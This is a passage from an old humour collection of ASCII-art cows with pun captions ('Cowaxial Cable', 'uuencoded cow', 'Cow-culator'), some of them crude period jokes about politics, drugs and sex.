- ^^ ^^ ^^ ^^ ^^ ^^
- Cow about to Cow giving Cow who's just Cloud of dust where
- give milk U.H.T. milk seen a McDonalds same cow was before
-
- (__) (__) s * )__(
- (oo) (@@) s / (oo)
- /-------\/ /-------\=== (__) \--___--\/
- / | || / | || /------(xx) | |
- * ||----|| * ||----|| * \ /\/ /\----/ \
- WWWWWWWWWWWWW ^^ ^^ ===----==== ^ ^ ^ ^
- Cow standing in Cow SMOKING Dead cow Mad Cow
- long grass grass
-
- (__) (__) (___) * (___)
- (00) (oo) (@ @) \ (* *)
- /-------\/ /-------\/ /-------\ / \-------\ /
- / | || / | || / | |O | |O
- * ||----|| * ||O---|| * ||O---|| ||@>--||
- ^^ ^^ [__]. ^^ [__]. ^^ ^^ ^^
- Norwegian cow Calf having Calf making Same bull after
- drink mistake calf went away
-
-
- (__) * (__) (__) (__)
- (DD) \ (xx) (oo) (oo)
- /-------\/ \-------\/ /-',',', \/ /-------\/
- / | || | || ./,|',',',',' / | (+) ||
- * ||----|| ||----|| |''''''| * ||----||
- ^^ ^^ ^^ ^^ ~~ ~~ ^^ ^^
- Cow watching Cow having a Jersey Cow The "bummer of
- above bull sexual fantasy a birthmark" Cow
- (with due accowlades
- to Gary Larson
- -\ /- (The Far Side))
- '\/'
- (oo) _________
- /------- \/ | \ /|
- ./ | , | - -X- - |
- |------| |/______\_|
- --|------|---------|-------
- /---------------------------\
- / __ \\
- // / \ __ \\\
- /// / \ \\\\
-
- Highland Cow
-
-
- ________ \
- |########| \
- |########| \
- --------\ \
- (__) | \
- (oo) | \ ______________________
- \/ | | |
- /+++\ o | |
- /+++++\ | ____ |
- ~ #/##\#~ \ | / To | |
- / ii \ \ | \ W.C.| |
- ~~ ~~ \ | ---- |
- \ | |
- \ | |
- In"cow"tinent \|------------------------
-
-
-
-
- (__) (oo) /-------\/ / | || * ||----|| ^^ ^^
-
- A well adjust(1)ed Cow
-
-
- (__)
- (oo)
- ^^ ^^
- /-------\/
- / | ||
- * ||----||
-
- An ass-sort(1)-ed Cow
-
-
-
- >ysP -"JlAe B x
-
- A compress(1)ed Cow
-
-
- awk: Usage: awk [-f source | 'cmds'] [files]
-
- An awk(1)ward Cow
-
-
- begin 644 cow
- M"B @(" @(" @("A?7RD*"2 H;V\I"B @+RTM+2TM+2U<+PH@+R!\(" @("!\
- ;? HJ("!\?"TM+2U\? H@("!>7B @("!>7@H*
- end
-
- uuencoded cow
-
-
- __
- _|__|_
- (oo)
- /-------\/
- / |===w=||_|OO ... .... (bullets,where w=gun)
- * ||----|
- ^^ ^
-
- this is the cowboy-cow, in case u are wondering 'where
- the hell is the horse then ?', let me
- inform u that it too needs recreation and
- has gone to play man-shoes !!
-
-
-
- ___________________________
- | | (__) \
- | | (oo) |
- | | /-------\/ \____ Cow'ndom
- | | / | || ____) Use it to prevent AIDS
- | | * ||----|| /
- | | ~~ ~~ |
- | |___________________________/
-
-
-
-
- /-----------------------------------------------------------------------
- |[] ________ ________ ------ ________ ________ ________ ------ __
- / | (oo) | | (oo)| |[][]| |(oo) | |oo)(oo| |(oo) | |[][]| |
- | | _\/__| |___\/_| |[][]| |_\/___| |\/__\/| |_\/___| |[][]| |_
- |--------------------------| |--------------------------------| |----
- | | | | |
- +---/OOO==OOO\-------------======---------/OOO==OOO\-------------======----
-
- Cow-st liner
-
-
-
- _-_
- (__) [ ]
- (oo) /-_-
- \/-------/
- || |
- ||----||
- ~~ ~~
- (__) *
- (oo)
- /-------\/ ~~____________________________________________
- / | // ||\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/||
- * ||------+ ||/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\||
- ~~ ||\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/||
-
- _-_
- [ ] (__)
- -_-\ ( )
- \--------
- | ||
- ||----||
- ~~ ~~
- Andrei Ag-cow-si
-
-
-
-
- (__)___________________________________________________________(__)
- (oo) (oo)
- \/_____________________________________________________________\/
-
- Cowaxial Cable
-
-
-
- (__) (__)
- ( V V ) (oo)
- (>O O<) /-------\/
- ( A A ) / | ||
- /-------\/ * ||----||
- / | || | \ | \
- * ||----|| V> V> V> V>
- ^^ ^^
- Tammy Fae Baker's cow Imelda Marcos' cow
-
-
-
- ++ ++
- +||---||+
- (__) | 1 2 3 | (__)
- (oo)O | 4 5 6 | (oo)
- /-------\/o/ | 7 8 9 | /-------\/__
- / | |__/~~~~~~| * 0 # | / | |__\/ \~~~~~~~/
- * ||----| +-------+ * ||----| \_____/
- ^^ ^ ^^ ^
- Cattle call Cow punch
-
-
- (__) / _
- (oo) / / \
- -\/-/ | + |
- /\__/_| (___) |___|
- / / (o o) (o o)
- | / /_______\ / /-------\ /
- \ _ / / |-,---||O / | ||O
- | | * || || * ||,---||
- ^ ^ ^^ ^^ ^^ ^^
- Cow Ripken Bullemic Papal Bull
-
-
- ___ ___
- \ \ \ \
- (___) ___\__\__\__\__
- (o o) | O O O O O O|
- --\ /----+-------------+-------/
- | O /
- \ /
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Steerage
-
- ___________________
- ___ ( I MOO-ON MY WAY )
- _|___|_ //~~~~~~~~~~~~~~~~~~
- v v ( uu| '
- / (___) \ /\_c|
- | (o o) | / \ C#=}~|
- \_\ /_/ | ) \ (___) _____
- | O | | | o | (- -) / zzz |
- | | \ | | | /-------\ / ---<______/
- /~~~\ [_] o ] / | ||O
- / \ | / \| * ||,---||
- ~~|~~|~ L_/ | ^^ ^^
- | | || || Bulldozer
- \ \ || ||
- ID ID
- Le Bullet Russe
- Dick Tracy's Cow
-
-
-
- | ==================================
- | = =
- | = _____ =
- | = ______ / \ =
- | = / \ | \ =
- | = / ||\ (__) =
- |## (__) m m = (__) __ || \ (oo) =
- | ## (oo) / / = (oo) / \||(__) \/ =
- | ## |\/ / / = \/ (__) ||(oo) =
- | ## | / / m m = (oo) || \/ =
- | ## \ \ / / = \/ || =
- | ## \ / / = || =
- | ## \ / / = || =
- | ## \-- = || =
- | ## | = || =
- | ## --* = || =
- |____________##_______________ = || =
- ## = || =
- ## = =
- ## = cow-cow nut =
- ## = =
- ## = =
- ## ==================================
- ##
- ##
- ##
- ##
-
- Cow-sine wave
-
-
- Cow tipping:
-
- Step 1. Step 2.
- (__)
- (--)
- /-------\/ O--------O_
- / | || /| :: |_)
- * ||w---|| * O--------O
- ~~ ~~
-
- *
- (__) ________ * *
- (oo) ====________| * *
- /-------\/ /\
- / | || / \ *
- * ||----|| / \
- ~~ ~~ / \
-
- A Cowsmologist
-
-
- \ / _ /\ ` `_______ ` `
- /\/______\/ / \ `/_/_|_\_\ `
- | (__) /(`')\ ` |(__) `
- *---|______(^^) /-------\/ ` |(oo) `
- \/ / | || ` ` J \/ `
- * ||----||
- Cowt-of-order ~~ ~~ Cow in Bergen, Norway
- (Me-cow-nical failure) Cowloon (Rains 300+ days a year)
-
-
- (___) ________
- .____ (o o) / \ )
- / \ / --| UGGGGH! |
- / || O \________/
- / / ||
- / / ||
- /_____/__, ||
- *------'---------' ~~
- Sitting Bull Bull's Eye
-
-
-
- _________________________
- (___) / ...The President then \
- (o o) / had to take into serious \
- /-------\ / ----| consideration what implica- |
- / | ||O \ tions it would have for.../
- * ||,---|| \_________________________/
- ~~ ~~
- Bull-etin from the White House.
-
-
- ________________________________________________
- @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- %% %% %% %%
- || || || ||
- || || || ||
- || || _ (_) \o/ || ||
- || || /|_|(_) | || ||
- ____||______||_"_|_|_______/_\______||______||____
-
- The Roman Cowliseum...where ancient Christians were fed to
- vicious beasts...
-
- _
- | \ (___)
- | \ (__) (__) (~ )
- *----|---------------(oo) (oo) (o o)
- | ______ |\/ /-------$/ /-------$/
- |___/ /_____| / | ^^ || / | ||
- / / \____/ / / * ||-----| * ||------|
- / > > / ^^ ^ ^^ ^
- > > MacCow MosCow
-
- Stelth Cow
-
- *
- vv vv /
- ||____M__||/
- || || (__)
- /\||_______|| (xx)
- (Xx) \/
- (--)
- Cow by Georgia O'Keefe
- Dead Cow
- (__)
- (oo)
- \/
- /\
- __/---\ //\\
- <__/-(__) o/||\o
- (oo) (oo) //o||\\\
- /-------\/ /--\/ o///||o\\o
- / | || / -- ||
- * ||----|| || =====
- ^^ ^^
- A Christmas Cow-el
- The Butcher of Baghdad Karen Cowpenter
- (Saddam Holstein)
-
-
-
- (__ (__) (__) | | (__)
- (oo) (--) (--) | | (--)
- /-------\/ /-------\/ /o /-------\/ | I \/-------\
- / | || / | L |----< o / | D |----<T I>----| M | \
- * ||----|| * ||----| / o * ||----| I I |----|| *
- ^^ ^^ ^^ ^ | ^^ ^ | ^ ^^
- | |
- Cow owned by
- Vincent Van Gough Teenage Mutant Ninja Cows
-
-
- \\ //
- \\( )// (__)
- (o o) ( ) /(oo)\
- \ / (oo) / \/ \
- / \ ##########\/ / /\ \
- | | # ######## # / / \ \
- \___/ * # ###### # | | | |
- // | \\ # # # # | | | |
- // \\ |___| |___|
- " " Mosscow Cowderoys
- Cow11
- _____
- <_____>
- ( ) (==) |
- (oo) __ /------\/- *
- /---*-.---\/ (oo) / | | \/|
- / |* . * .|| /-------\/ * | |
- * ||------|| : :: |===|===|
- ~~ ~~ ::----:: ^^ ^^
- ^^ ^^
- Cow w/ cowpox Boris Cowlile Cow on Graduation day
-
-
- /
- /\ /
- \/ (__) / \ | /
- || <`'> / \ | /
- (_||_) \/ /^ _____ ___ _____
- __\||/__ #=======> | _ /(o o) \
- | /xx\ | ( )==/ (_)------/---\ / \
- __\xx/__| I____I | ||
- /ww\ ,---( _ ) . ||----||
- /| |\ / || \_=======|| oo oo
- |^ ^| ||
- ^ ^ || heli-COW-pter
- ==
-
- COW giving birth The Ninja Cow
-
-
-
-
- * (__)
- \ (oo) ________(__)_
- \---------------\/ |COW-SIO (oo) | (_--_)
- | 0.0 | | _______\/ | /*__*\
- |---------------| | |_________| | * __|(oo)|_
- | C CE ^ - | | | \/--( \|==|/ )
- | 7 8 9 + | | C = / * | | \ /
- | 4 5 6 * | | 7 8 9 - | \ \ | | | |
- | 1 2 3 / | | 4 5 6 + | | |-\ /-\ /
- | 0 . = | | 1 2 3 | ^ ^ ^ ^
- | || | 0 . = | NFL Dallas "COWBOY"
- ||-----------|| |_____________|
- ^^ ^^
- Cow-culater Cow-culator
-
-
-
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/ /-------\/ /-------\//-------\/
- / | || / | || /| || /| ||
- * ||----||* ||----||* ||----||* ||----||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- COW-comitant
-
-
- (__) (__) (__) (__)
- ($$) (&&) (YY) (%%)
- /-------\/ /-------\/ /-------\/ /-------\/
- / | || / | || / | || / | ||
- * ||----|| * ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ .. .. $& #Y
- USA'$ cow GB'& cow JP'y cow Bank'% cow
-
-
-
- _____________
- | |
- | INDIANA 45 |
- | | |
- | PURDUE 52 | |
- |_____________| |
- ______|====\
- \/\/\/ \\
- \/\/ \\
- \\
- \\
- (__) __ \\
- (oo) /)(\ \\
- * / \/_/~\__/ ||
- \ / __/~ ||
- \/ / ||
- | _/ ||
- | | ||
- ~ ~ ------
- Hoosier
- Cow
-
-
- . .
- . . (__)
- (___) . (___) . (oo)
- (o o) . (- -) . /-------\/ 5+2=?
- \ / . \ / . / ! !!
- Q.. Q.. * !!----!!
- ^^ ^^
- smokin' cow waisted cow cow who cow'nts
-
-
- (__) (__)
- (00) ( )
- /----------------\/ \/---------------\
- / | | | | \
- * ||-----------|| |||----------||| *
- ^^^ ^^^^ ^^^ ^^^
- SIDE VIEWS
-
- | |
- | |
- | |
- | |
- | |
- * |
- ^^^ ^^^
- BACK VIEW FRONT VIEW
-
-
- ^ (___)
- _- --/ - `\ ^ |*-*|
- _________/_________ ^____ _ \o/`-\
- " /| \ / U |
- (__) ` /_| _ - \/\ | /
- |@@| | | //
- \/`--------.__/ | C/
- | / \---/
- //`---\/|| |/\ |
- || || || ||
- || ||
- || ||
- Helicowpter
-
- Cool Cow
-
-
- (__) (__) |
- (oo) ($$) |__ /---------o*o
- /---------------------\/ /-------\/---|| / | ||
- / | | | | | || / | | || * ||-----||
- * ||--||--||--||--||--|| * ||----| -- ^^ ^^
- ^^ ^^ ^^ ^^ ^^ ^^
- Cowterpillar Yuppie cow with Cow that was captured
- mobile phone. by head-shrinkers
-
-
- ((( ))))
- (( ( ))) ( ) I'm a cow, man !
- ( ( ) ) ) ^^^^^ /
- ( ( ( )))) | | _/
- ( ( / ) ) ) O O /
- ( ( \\ ) ) ) \ C / -
- ( : // ) ) ~
- : : / \
- : : O / | | \
- : : ( | | )
- : : \ \___/ /
- : : (__) W/ \W
- : : (oo) /|_n_|
- : : ----\/ / || ||
- : : :: | () ()
- : : ---:: * || ||
- ------------^^ VV VV
- Newton's Cow
- (aka Mooton) Bart Cow
-
-
-
-
- __
- >(__) This cow will make all those desisions for you by changing
- (oo) color according to the action you should take.
- /-------\/
- / | || If this cow appears to be:
- * ||----||
- ^^ ^^ GREEN: Yes, Go ahead
- MAGIC DESISION
- MAKING COW. WHITE: No, unless it is raining.
-
- AMBER: Buy a better monitor/terminal
-
- GRAY: Adjust your contrast/brightness control
-
- BLACK (on black): Turn terminal/monitor on.
-
- BLACK (on white): Lucky git!
-
- ANY OTHER COLOR: Send terminal/monitor to repairer's,
- quickly!
-
-
-
- /~~\ +
- ) ( \__/ O O
- ( o)\ ========== o_o_o
- * \o / / {__} \ (___)
- \ \/-----\ / (**) \ (___)
- \----- || \ \ \/ / (___)
- $ | --|| * \"mon / ( 00
- ||-vv-- ~~ \ parfum"/ \_ |
- ~~ ======== \_o
-
- Pablo Picowsso Paloma Picowasso King Cowles II
-
-
- ______ ___________
- : Oui? : : :
- _______ `v-----' : CORNED :
- : Nee! : (__) : BEEF :
- `------v' (oo) :_________:
- /-------\/
- / : :: An exercise found in a text book of quantum
- * ::----:: mechanics: "solve the Schrodinger equation
- ^^ ^^ of a cow in a box. Please, pay attention on
- the boundary conditions!"
- Belgian Cow
-
-
- (__)
- (oo)
- /-------\/
- / : :: (/\)
- * ::----:: /oo\ (__)
- XX======^^====^^==>> /-----/____\ (--)
- X US MISSILE >> / | || /--------\/
- X Greetings >>> * ||----|| / \ | \__
- X George >> ~~ ~~ * /__-------__|
- XX================>> ~ ~
- Cow klux klan Cow resting
- Irakean Cow
-
-
-
- ___()
- COW ------------| o\
- | )O-------------- MOO
- -----|____/ /
- \ /
- \ / (____)
- \ / \( )
- \ / |\( )
- \ / \ \( )
- \ / \ \( )
- X |\ \( )
- / \ | \ \( )
- / \ \ \(____)
- / \ \|_o_o_|
- / \ | |
- / \ | |
- / ___() \
- -----| o\ \ cow chip
- | |O-------------- ~MOO
- BULL ---------- |____/
-
- Cow Flop (new flip-flop, patent pending)
-
-
-
-
- ( ) ( )
- \ / \ /
- \___/ \___/
- (o o) (o o)
- /-------------\o/ /-------------\o/
- / | || / | ||
- * ||-,--------|| * ||@\\-------||
- || || || \\ ||
- ~~ ~~ ~~ ~~
- Texas Longhorn Steer Texas Longhorn Bull
-
- __
- (__) ( ) (__)
- (oo) / (oo)
- _______\/ / \ _______\/
- / / \ /| |
- / | || / \ / || ||
- * ||-__-|| (_____________) * ||----||
- ^^ ^^ ^^ ^^
- Pregnant Cow Hanger De-calf-inated
-
-
-
- (__) (__) iiiiIiiii
- (oo) (oo) '|o o|`
- /---------\/ ---------\/ ________\_/
- /| | || / | || / | |
- * |__|-----|| //____\-----|| # ||ww____||
- || || * || || || ||
- ~~ ~~
- cow-boy cow-girl Happy Hannucow!
- (or a Sco(w)ttish cow-boy)
-
-
-
- \_ ^
- \ | **~~~~~~~
- _____) \___ | **~~~~~~~
- __/ \__ (__) | ~~~~~~~~~
- _/ \ (oo) | ~~~~~~~~~
- / ____ ( ) \/ |
- / / __/ \__ |o o| /( \/|
- /| ||_/ \ \ / ( ) |
- ^^^^^^^^^"^// /^^^^^^^^^^^^^\ \\^^^^^^^^^^ /~\ |
- // / | ||
- [][] [][] Patriotic Cow
-
-
- Sha-MOO
-
-
-
- /\
- / \
- / \
- | |
- / * * \
- / ** * \
- / * ** \ **
- / * * \ ** **
- . . . | | * * <--- the world
- . . / **** \ * *
- . . . / * * \ ** **
- . . . / **** \ **
- . / * * \
- . | |
- . / **** \
- . / * \ . .
- . / **** \ . .
- / * \ . .
- / **** \
- | | . . .
- | **** |
- | * * | . . .
- | **** | . . .
- | * * | . . .
- |------------------------------| . .
- | (__) (__) (__) (__) (__) | . .
- . /| (oo) (oo) (oo) (oo) (oo) |\
- / | /\/\ /\/\ /\/\ /\/\ /\/\ | \ . . .
- . / |=|==|==|==|==|==|==|==|==|==|=| \ .
- . / | | | | | | | | | | | | \ .
- / USA | ~||~ ~||~ ~||~ ~||~ ~||~ |NASA \ .
- |______| ~~ ~~ ~~ ~~ ~~ |______| .
- . (______________||______________) . .
- . /_\ /_\ . . .
- !!! !!!
-
- The herd shot 'round the world.
-
-
- (_ _)
- ___ (o o)
- (__) _- -_( )
- (++) /- O O
- /____O/ / | ||
- /| || * ||-___-||
- * ||--|| ~~ ~~
- ~~ ~~
- This cow belongs to This cow belongs to
- Mr. Bill Rosanne Barr
-
- _________(__)___
- | -------------- |\
- (__) (__) "slurp" /|| || \
- (oo) (oo) / ||milkfat 1% || \
- /-------\/ \/-------\ * * ||______________|| /
- / | || \__/ || | \ * |________________|/
- * ||----|| | | ||-----|| * * || ||
- ~~ ~~ |__| ~~ ~~ * ~~ ~~
- *
- cowoperation ----------------------
- / - - - - - - - - --- /
- / - - - - - - - - --- /
- ----------------------
- (oooo) personal cowmputer
- oo( -0 )oo
- / ------------ \/
- / | | /|
- / | ----\_/ | / |
- > < ||| ||| / |
- ||| ||| |/ |
- ~~ ~~ \ |
- Wendy Wellesley Cow- /| // (__)
- note the shapely figure and painted / /\// (oo)
- hooves---and the sexy wink reserved | | / /-------\/
- for MIT men. | / / | ||
- | / * ||----||
- | / ^^ ^^
- _____ * |/ breacowt!
- (_____) /
- ( OO )_____________ /
- (/~~\) ######### \/ |\------------\
- \O_/ * * * * |= = = = = =|- SCUD )
- | ######### | |/------------/
- | |__________| |
- || | || |
- || | || |
- ~~~~ ~~~~
- Saddam moo-sein
-
-
-
- @
- (__) (__) _____/
- /| (oo) _ (oo)/----/_____ *
- _o\______/_|\_\/_/_|__\/|____|//////== *- * * -
- /_________ \ 00 | 00 | /== -* * -
- [_____/^^\_____\_____|_____/^^\_____] *- * -
- \__/ \__/
-
- Cow-mobile
-
-
-
-
- (()) (()) ||||
- (oo) (oo)
- /------\/ (OO) /------\/
- /| | /------\/ /| |
- * ||----|| /| | * ||----||
- ^^ ^^ * ||----|| ^^ ^^
- ^^ ^^
- Don King cow Don King cow after Buckwheat cow
- getting electric shock (Otay? Otay!)
-
-
- /\
- / \ (__) __
- (oo) (oo) (oo)
- /------\/ /-ooo--\/ /------\/
- /| | /|o | o | /| |
- * ||----|| * ||o^o || * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-
- "Conehead" cow Anti-war cow Sinead O'Connor Cow
-
-
-
- o o - -
-
- O Moo!!!!
-
- ghost-cow sleeping ghost-cow
-
-
-
-
-
- Cow-nty Police Officer Cow-nty Police Car
- ___
- [___] ____|___|____
- (o o) / [__] \
- /------------\-/ / (oo) \
- / | ||^ |V / |\/| \
- | | <**> | |-----------------|
- * -----/\------ | Cow-Price |
- || O O || |_________________|
- || || \_________________/
- || || | | | |
- oo oo |__| |__|
- (With gun and Handcuffs)
- (it's a Cow-Price)
- (Classic of course)
-
-
-
- \ /
- \ /
- (__) \ (__) /
- /\/\_(oo) \ /\/\_(oo) /
- // == \ // == /
- / | /\/\|| \ / | /\/\|| /
- * || || \ * || || /
- ^^ ^^ \___^^____^^_____/
- Silly cow
- (his father was a camel) Sillycow-valley.
-
-
-
- ___ __ __ _
- (( /\ (__) ( /\/ \(__) (__) //
- \\ /\ (oo) \ /\\/(oo) _(oo) //
- ,----\ /\--\/ ,----\ /\--\/ /----/ \\/ //
- ( ) ) ) // || ( ) ) ) // || / ||-- ( ) ====
- `-----//--|| `-----//--|| * || \_( ) //
- ^^ ^^ ^^ ^^ ^^ ^ ^
- beecows Cownan the barbarian
-
-
- (__) (__)
- (oo) (oo)
- /-------\/ /-----------------\/
- / | || / | /qwertyuiop \||
- * ||----|| * || asdfghjl; ||
- ^^ ^^ || zxcvbnm,./ ||
- sliced cow ^^ ^^
- keyboard-cower
-
-
- ( )
- (oo)
- /--------\/
- / || ||
- * ||------||
- || ||
- ( ) || ||
- (oo) || || | | | |
- /--------\/ || || || || || ||
- / || || || || || || || ||
- * ||------|| || || || || * ||------||
- || || || || || || \ || ||
- || || || || || || \--------/\
- || || || || || || (oo)
- ^^ ^^ ^^ ^^ ^^ ^^ ( )
- high cow very high cow broken very high cow
-
- __ (__)
- (__) (__) (oo)
- (\/) (oo) < vv >
- /-------\/ /-------\/____) / \
- / | || / |______ | | /| |\
- * || || || || __ / |( )| \
- ____||_____||_____/ _______ / ||""||\ \
- cow san /___||__||_*_\
- Ge-cow-logist ~~ ~~
- Cownt Dracula
-
- (__) ( )
- * ` (OO)' (00) //
- \_/-------\/ ` ___ \/___//
- || ||_. ` /---\_/---\
- %_/ ~-----\ ------------------
- ~ l l
- l___________l
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ l ll ll l
- // // // / / | \\ \ \ \\\ l v v l
- - -
- Cow on a hot tin roof A 'cow'ntant
-
-
- \ ,_________________./ /
- (__) -/.__________________ -
- oo ) \ (__) / \
- _!_/_ \ (oo) /
- !--!-\___/ !\ \.\/./
- !__! ! ! \ | |
- \___/ * | |
- / W \ / | |
- ! ! o / / / \'
- ! ! /|\/' | \
- ______/_\_________________|______\ _____
- Cow from ^ ^
- Velke Popovice Brewery David and Cowliath
-
-
- .
- . .
- . . . __ __
- . ||______________________||
- . . || __________________ ||
- / || | (__) | ||
- . . / || | (oo) | ||
- | -|| | _\/_ | ||
- . . \ || |=---------/(())\-\| ||
- (\ |\-----------------------\
- . (\ || \_______________________\
- \|| | |
- . \| | (O) |-----------| (O) | .
- \ | |-----------| | .
- . \ | PETERBILT | .
- \| |
- . (=========================)
- |_||_| |_||_|
- . \
-
- . \
-
- Pompano Beach or bust!
-
-
-
- ^^^
- ^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^^^^^^^
- *********************************** \ /
- *********************************** \ /
- *********************************** \ /
- *********************************** \ /
- \ ^(__) /
- \ / (@@) /
- 82nd Cowborne Cowtrooper \|__\/__
- | | |
- | | |
- |__|-^-
- / \ \__*
- | |
- ^ ^
-
-
-
- -----------------------------------------------
- | U. S. Federal Prison |
- |---------------------------------------------|
- | | | | | | | | | | | | | | |
- | | | | | |^ | (__) | ^| | | | | | |
- | | | | | | \| (00) |/ | | | | | | |
- | | | | | | \__\/__/ | | | | | | |
- | | | | | | | | | | | | | | | | |
- | | | | | | | | |-| | | | | | | |
- | | | | | | | / \ \_ | | | | | | |
- | | | | | | |/ \| \* | | | | | |
- | | | | | | ^ ^ | | | | | | |
- -----------------------------------------------
- Former Panamanian General "I'm not a Mule" Manny Cowiega
-
-
-
-
- ---------------------------------------------------------
- ---.---.---.-------.---|.-- ---------|---|----
- --.-.---.---- (__) -----.---.---|-
- -|---|- __) (++)___ -----.---|---
- ----| ^\ ^\ (xx) ___\//---^ -----.---|--
- ----- | \____\_\/ / \ \_____ ---.---
- ========= - \_____/\ ^ . \_/____ ^ -====
- . - - / \ ' ^ . - .
- \ / . ^ - \
- ` ^ ` ` `
- Former despot Romanians Nicolae and Madame Cow-cescu
-
-
-
- (__)
- (OO) __
- \/ |__|
- // \ |
- // \ \ |
- ^^ \// \ |
- /-------------\
- -----------------------/ Panama \
- ----------------------/ or \
- / Bust! \
- _____________/---------------------\_____________
- / \
- / \
- \ /
- \_________________________________________________/
- M1 Abrams Cow Commander
-
-
-
- (__) *
- (OO) |
- \/ |
- // \ -----
- // \ \ / \
- ^^ \// \ / \
- // \ | |
- --^^------ * / \
- \ ____ / / / \
- |||||| | \ |
- |||||| / \ \
- |||||| | / |
- |||||| /___________\_______\
- |||||| /
- |||||| (_/)
- __||||||||__ (@@)
- | .,....,. | \/
- | ...,.,.. |
- ------------ Cow Bell (or the Liberty Cow Bell)
- The Acowdemy Award
-
- ____________________________________________________________________
- | ________________________________________________________ |
- | 10 ) T H E U N I T E D S T A T E S O F A M E R I C A ( 10 |
- | / ........... ____ \ |
- | | / \ A10806726C | |
- | | 1 (A) | (__) | ___ __ __ 1 | |
- | | | (oo) | | |_ |\ | | |
- | | A10806726C | _\/_ | | |__ | \| | |
- | | 1 .......... \//;;/\/ ........... 1 | |
- | \ ......... _______________ ........ / |
- | 10 )___________________/ TEN DOLLARS \____________________( 10 |
- |______________________________________Abortion Rally calls__________|
-
- Cownterfeit
-
-
- >>>----> *___ ______
- \ __|_**_|__
- >>>----> \ | . . |
- \ _______________\ /
- * ( | | US CALV| \o/
- >>>----> / /\ |_________| \-- |
- ( / / \ \__________\_\ ---| |
- >>>----> . ( ) / / \ \ \ \ |*|
- . / / \ \ \ \
- . /* \ \*\ \*\
-
- The CALVelry COWard
-
-
-
- ____
- | | . .
- vv vv __|__|__ \ /
- ||----|| * \00/ \__/
- || | / /-----------C\/C (oo)
- /\-------/ / | CCCC /-------\/
- (oo) / ||_________CCCC / | ||
- (~~) * || || * ||----||
- nn nn ^^ ^^
- Australian view of a
- North American Cow Abraham Lincow This cow belongs
- to "My Favorite Martian"
-
-
- (__) (__)
- (oo) (oo)
- (__) >------\/------< >------\/------<
- (oo) | | | | | | | |
- >------\/------< | | | | | | | |
- | | | | | | || | | | | || | |
- | `____' | | `----' | | `-OO-' |
- `--|--|--' `--|--|--' `--|--|--'
- | | | | | |
- ^ ^ ^ ^ ^ ^
-
- "FLASHER" calf "FLASHER" steer "FLASHER" bull
-
-
-
- (Big Mac)
- (_____) _____________
- \0 0/ / \
- _________(o o) XXXXXXXXXXXXX
- / | U | \_____________/
- * | /______ _ |
- || || || ||
-
- this is a cow... this is a cow on drugs
-
- Any questions??
-
-
- .
- \---) (__) *
- |o o) ==== /
- (---\o/--\ /-------\/ (___)--------|/
- | |#| ) | / | || (o o) ||
- | |#| ) | * ||-||-|| YY ( )-||--I--||
- ^ |#| ) ~ ^^ ^^ ^^ ||--I--||-( ) ^^
- //--\ || ^^(o o)--<
- // | \ This cow is from Mars. /|--------(---)--<
- || * | /
- ^^ ~ * "69"
- Cowborg
-
-
-
- * * *
- *
- * * (__) *
- * _--_ ( oo) *
- _- )\ '|
- * /| ) _ \ \ ~~ * *
- / \ \-- \ \
- *-' // / > >
- > >
- / / *
- / / *
- _ _ -- _ _
- / \ *
- * / _ _ _ \
- | / \| *
- | |
- * | | * *
- | |
- | | *
- | \_ _ _ /|
- \ /
- * \ _ _ _ / *
- ---
-
-
- "COW JUMPED OVER MOO_N, REVISITED"
-
-
- (__)
- (__) \__\/__/
- {}\ (oo) l l
- /----\----\/ l__l
- / | \ |\ / l__\
- * || >-+-\ <\ / /
- || | ())))) \ \ ))))))
- ^^ ^ / )))) \ \))))))
- / \ / (
- bum steer ~~~~ \ / ~~~~~~~~~~~~~~~~
-
- Cowabunga!!
-
- (__)
- (~~) V __ (__) (__)
- /--------\/ | / \ (oo) (oo)
- * | | ----: /-- --\/ /-------\/ {BIG MAC}
- >--: |----| / | || / | |---/
- | | * ||-----|| * ||----|
- ^ ^ ^^ ^^ ^^ ^
- beef jerky cowsimodo cownibal
-
-
- _______\
- -<| CUD \
- /-<|_______/
- (__)// / ((|))
- (oo)/ ($ $)
- \// /-------\_/ *
- / | / | ||__<i
- __ | | * ||----|
- * \| _| ^^ ^
- / |
- / | New Kow on the Block
- ^ ^ (note lighter in hoof)
-
- CUD missile launcher
-
-
-
- ((----))
- ((oooo))
- ///-----\\\///
- ///||| |||
- *** ||||||---|||
- ^^^^^^ ^^^
-
- where milkshakes come from
-
-
-
- -------------------------------------------------------------------------
- | ___________ | | |
- | (__) ( You know, ) | (__) ________ | (__) ______ |
- | (oo) ( Kentucky ) | (oo)( How do )| (oo) ( )|
- | /-------\/ ( cows are ) |---\/ ( they )| \,,/ ( MOOF )|
- | / | || (bucktoothed) | || \( talk? )|/-------\/ \ ( )|
- | * ||----|| \ /---------- |--|| \/------- | | || \/------ |
- | ^^ ^^ \/ | ^^ | ||----|| |
- | | | ^^ ^^ |
- ------------------------------------------------------------------ J.B.--
-
- Cowmic Strip
-
-
-
-
-
- | \___________________________
- | ___________________________
- | / /
- | | /
- | | /
- | | (__) /
- | | (oo) /
- | | _\/_ /
- | | / ==%
- | | / ==%
- | | *---<_ / /
- | | / /
- | | / /
- | | ~ ~
- | |
- | | Moowgli
- | |
- / \
-
-
- (__) . . . . (---)
- \oo/ . . .. . (-------(----)----( ) *
- /;;\ . . . (__) ( ( ) )(x x)_____/
- \__| |__/ . . . (oo) \ OO---------OO-/ O \_/\/\/
- |%%%%| //-------\/ OOOOOO OOOOOO / \
- ~ ~ // | U M || OOOOOO OOOOOO . .
- ~ ~ ** ||----||
- grandcow is ^^ ^^ Argyle cow about to be hit by
- sitting Go Blue Cow an armored personnel carrier
-
-
- (__
- (o ======]
